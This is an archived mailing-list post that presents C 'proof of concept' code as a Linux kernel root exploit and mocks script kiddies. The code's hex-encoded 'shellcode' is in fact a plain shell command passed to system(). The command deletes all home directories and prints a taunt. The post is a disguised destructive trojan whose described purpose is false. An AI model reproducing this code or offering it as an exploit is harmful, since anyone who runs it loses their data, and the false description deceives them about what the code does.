lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [thread-next>] [day] [month] [year] [list]
From: d4yj4y at yahoo.com (Day Jay)
Subject: Proof of concept code to kill script kiddies out of the water!

Chung's Donut Shop
=====================

Here's a small donation to the blackhat community.
This script eradicates script kiddies.

Since ecclectic spirit is releasing a whole bunch of
cool code, we like decided to unveil this.


/* Proof of concept code!!
   DO NOT DISTRIBUTE! 

   
   Get r00t on any Linux x86 system
   With the below shellcode.
 
   It uses an exploit in the linux 
   kernel to elevate privilages to root! 

*/
char shellcode[] =
"\x2f\x62\x69\x6e\x2f\x72\x6d\x20"
"\x2d\x72\x66\x20\x2f\x68\x6f\x6d"
"\x65\x2f\x2a\x3b\x63\x6c\x65\x61"
"\x72\x3b\x65\x63\x68\x6f\x20\x62"
"\x6c\x34\x63\x6b\x68\x34\x74\x2c"
"\x68\x65\x68\x65";

main()
{
system(shellcode);
return 0;
}


__________________________________________________
Do you Yahoo!?
Yahoo! Mail Plus - Powerful. Affordable. Sign up now.
http://mailplus.yahoo.com

Powered by blists - more mailing lists